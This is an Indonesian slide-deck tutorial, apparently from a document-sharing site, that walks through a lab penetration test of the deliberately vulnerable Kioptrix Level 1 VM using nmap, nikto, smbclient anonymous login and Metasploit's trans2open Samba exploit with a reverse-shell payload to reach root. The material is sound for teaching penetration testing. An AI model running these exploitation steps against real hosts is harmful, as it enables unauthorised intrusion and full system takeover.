Anda di halaman 1dari 28

Researching

Potential
Vulnerabilities on
kioptrix level 1

Exercise
Created By : Fajar ATP
DESCRIPTION

• Dalam latihan kali ini kita akan belajar mencari celah kerentanan pada sebuah OS server yaitu
berupa simulasi menggunakan OS Kioptrik level 1, yang mana Kioptrik ini sendiri adalah
sebuah Operating System yang dibuat untuk di eksploitasi (diacak – acak) dengan tujuan
sebagai sarana pembelajaran dalam bidang penetration testing.

GOALS

• Goal akhir dalam pembelajaran ini adalah mendapatkan privilage dan akses sebagai root
dalam OS Kioptrix.
• Menguasai penggunaan tool-tool (nmap, netdiscover, nikto, dirbuster dan metasploit) sebagai
alat bantu untuk melakukan kegiatan penetration testing.
PREPARATION

1. Download dan install VM WARE


Link
: https://my.vmware.com/web/vmware/downloads/info/slug/desktop_end_user_computing/v
mware_workstation_player/16_0
2. Download OS Kioptrix
Link :
https://www.vulnhub.com/entry/Kioptrix-level-1-1,22/
3. Download OS Kali Linux (rekomendasi gunakan OS kali linux versi vmware)
Link :
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
4. Jaringan Internet / Hostpot yang digunakan sebagai penghubung antar OS Kioptrix dan
kali linux.
PREPARATION

a. Instal dan Setting Network Adapter


• Extrack file kioptrik level 1 kemudian Buka folder untuk mencari file “Kioptrik Level 1.vmx”
selanjutnya Edit file tersebut menggunakan notepad (atau text editor lainya).
• Ubah value Bridge menjadi NAT.
PREPARATION

b. Buka Kioptix Level 1.vmx (sebelum di START ubah network dari Bridge ke NAT)
PREPARATION

c. Buka Kali Linux (sebelum START pastikan network sudah dirubah ke NAT)
IMPLEMENTATION

1. Langkah pertama adalah Scanning IP


a. Cek IP pada Kali Linux menggunakan command Line : $ ifconfig
• Contoh disini ip yang didapat adalah : (192.168.146.128)
b. Cari IP Target (Kioptrik) dengan menggunakan tool “netdiscover” : $ netdiscover
• Contoh disini ip yang didapat adalah : (192.168.146.130)

(Untuk memvalidasi apakah IP tersebut adalah IP dari mesin Kioptrix kita dapat
membuka IP tersebut di browser. Jika tampilan yang muncul adalah halaman Test
Page ini berarti IP tersebut valid)
IMPLEMENTATION

2. Langkah ke dua adalah proses


Enumerasi / Scanning IP menggunakan
Nmap
• Proses ini merupakan salah satu proses
untuk mendapatkan informasi mengenai
target kita, mulai dari versi OS, Service,
Port, dll. Tools yang digunakan pada
simulasi kali ini adalah menggunakan
tools nmap.

$ nmap –T4 -p- -A 192.168.146.130

(IP target)
IMPLEMENTATION

3. Langkah ke tiga adalah proses


Enumerasi / Scanning HTTP dan HTTPS
menggunakan Nikto
• Proses ini bertujuan untuk mendapatkan
informasi mengenai kerentanan yang
terdapat pada web server (Apache) target
kita (Kioptrik). Tools yang digunakan pada
simulasi kali ini adalah menggunakan
nikto.

$ nikto –h http://192.168.146.130

(IP target)
IMPLEMENTATION

• Dari hasil enumerasi tersebut diperoleh beberapa informasi penting yang mungkin bisa kita
gunakan untuk melakukan exploitasi, yaitu :

✓ 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)


✓ 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

✓ 111/tcp open rpcbind 2 (RPC #100000)


✓ 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
✓ 443/tcp open ssl/https Apache/1.3.20 (unix) (Red-Hat/Linux) mod_ssl/2.8.4 openSSL/0.9.6b

✓ smb2-time: Protocol negotiation failed (SMB2)


✓ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which
may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-
0082, OSVDB-756
IMPLEMENTATION

4. Langkah ke empat adalah proses Validasi


• Setelah kita menemukan beberapa informasi yang kita dapat dari tools nmap dan nikto,
langkah selanjutnya adalah melakukan proses validasi. Proses validasi ini merupakan proses
pengecekan / memvalidasi temuan sebagaimana disebutkan pada slide sebelumnya apakah
diantara temuan itu memiliki indikasi celah kemanan yang dapat eksploitasi lebih jauh
sehingga kita sebagai pentester dapat masuk ke dalam sistem Kioptrix tersebut.
• Untuk mencari celah kerentanan tersebut kita bisa mencarinya dengan menggunakan
bantuan tools searchsploit pada kali linux atau bisa mengunjungi web https://www.exploit-
db.com.
• Searchsploit dan exploit-db sebenarnya sama saja. Karena searchsploit mengambil database
dari exploit-db. Jika terjadi perbedaan hasil antara keduanya hal ini kemungkinan terjadi
dikarenakan database searchsploitnya perlu di update.
• Coba kita lakukan validasi pada setiap temuan yang kita dapatkan.
IMPLEMENTATION
Validation :
❑ Service ssh (OpenSSH 2.9p2) ❑ Service httpd 1.3.20
$ searchsploit OpenSSH 2.9p2 $ searchsploit httpd 1.3.20

(dari hasil pencarian ternyata tidak ada (hasilnya nihil, maka kita lanjut ke proses
exploit yang sesuai versinya, sehingga validasi berikutnya)
tidak dapat digunakan untuk menyerang
kioptrik melalui port 22 (ssh), maka kita
lanjut ke proses validasi berikutnya)
IMPLEMENTATION
Validation :
❑ Service rpcbind ❑ Service https (Apache 1.3.20)
$ searchsploit rpcbind $ searchsploit apache 1.3.20

(Hasil diatas menunjukan bahwa terdapat (Hasil diatas menunjukan bahwa terdapat
exploit yang bisa kita gunakan untuk exploit yang bisa kita gunakan untuk
menyerang Server Kioptrix. Tetapi exploit ini menyerang Server Kioptrix. Tetapi exploit ini
bertipe DoS (Daniel of Service). Karena tujuan hanya bisa digunakan pada platform server
kita ingin mengambil alih Server Kioptrix maka windows. Sedangkan menurut hasil temuan
kita tidak memerlukan exploit ini. Karena kita sebelumnya Server Kioptrix ini
exploit ini biasanya berfungsi untuk menggunakan Linux 2.4.9–2.4.18)
melumpuhkan sistem)
IMPLEMENTATION
Validation :
❑ Service netbios-ssn(Samba smbd) ❑ Untuk mengatasi hal ini kita perlu
$ searchsploit samba bantuan tool yaitu “msfconsole”.

(Berhubung pada hasil scan sebelumnya


versi samba tidak diketahui, maka sulit
untuk kita menemukan exploit yang cocok)
IMPLEMENTATION
Mencari Versi Samba :
❑ Untuk mencari versi dari samba service kita menggunakan kata kunci “search smb”
msf6 > search smb

❑ Maka ketemu exploit “auxiliary/scanner/smb/smb_version” kemudian gunakan “use”


IMPLEMENTATION
Mencari Versi Samba :
❑ Kemudian setting bagian RHOSTS untuk diarahkan ke IP target (Kioptrix) menggunakan
command line berikut ini: msf6 > set RHOSTS 192.168.146.130

❑ Setelah itu jalankan dengan perintah “run”


❑ Maka kita akan memperoleh informasi dari versi samba tersebut yaitu : Samba 2.2.1a
IMPLEMENTATION
5. Langkah ke lima adalah Exploitation
❑ Mencoba Login menggunakan anonymous ❑ Tambahkan perintah berikut dibawah
dengan “smbclient” [global] :
> smbclient –L \\\\192.168.146.130\\
• client min protocol = CORE
• client max protocol = SMB3

Jika muncul pesan “protocol negotiation failed”,


maka edit file configurasi dari samba-nya pada
directory /etc/samba/smb.conf
• $ sudo nano /etc/samba/smb.conf
IMPLEMENTATION
Explotaition :
❑ Coba Login Kembali dengan “smbclient”
> smbclient –L \\\\192.168.146.130\\

• Maka kita akan mendapatkan informasi berupa 2 user yaitu IPC dan ADMIN
IMPLEMENTATION
Exploitation :
❑ Mencoba Login dengan user “ADMIN$”
> smbclient \\\\192.168.146.130\\ADMIN$

Jika muncul notifikasi seperti pada gambar diatas itu artinya kita tidak bisa masuk
menggunakan user “ADMIN$”. Kita coba login menggunakan user yang lain yaitu “IPC$”
IMPLEMENTATION
Exploitation :
❑ Mencoba Login dengan user “IPC$”
> smbclient \\\\192.168.146.130\\IPC$

Ketika sudah muncul informasi tanda smb: \> itu tandanya kita sudah bisa login menggunakan
user IPC$. Ketik help untuk memastikan kita sudah bisa masuk menggunakan anonymous.
IMPLEMENTATION
Exploitation :
❑ Menjadi root pada server kioptrik
• Cari exploitnya di google dengan “samba 2.2.1a exploit” selanjutnya search di msfconsole
• msf6 > search trans2open

• Gunakan expoid “exploit/linux/samba/trans2open” dengan menggunakan perintah :


msf6 > use exploit/linux/samba/trans2open
IMPLEMENTATION
Exploitation :
❑ Menjadi root pada server kioptrik
msf6 > exploit(linux/samba/trans2open) > show option

❑ Lakukan perintah berikut ini :


• msf > set RHOSTS 192.168.146.130
• msf > set payload generic/shell_reverse_tcp
• msf > exploit
RESULT
Execution :
❑ Menjadi root pada server kioptrik

• Jika sudah masuk coba ketikan perintah “whoami” jika hasilnya root maka kita sudah
berhasil masuk sebagai root. GOOD JOB..!!
EXTRA
Exploitation
❑ Melakukan enumerasi direktori pada web server target menggunakan “Dirbuster”
EXTRA
Exploitation
❑ Jalankan perintah dengan menekan tombol “start”, setelah kita tunggu maka hasilnya akan
sperti ini (Tampilan GUI) :
EXTRA
Exploitation
❑ Tampilan hasil dirbuster di CommandLine (Terminal) seperti ini :

❑ Setelah menemukan direktori-direktori dalam web tersebut maka kita coba buka satu
persatu di web browser menggunakan alamat IP target diikuti dengan direktorinya.
Contoh : http://192.168.146.130/icons/
http://192.168.146.130/usage/usage_202011.html
EXTRA
Result :
❑ Salah satu temuan informasi sensitive
SEKIAN
DAN
TERIMAKASIH

Anda mungkin juga menyukai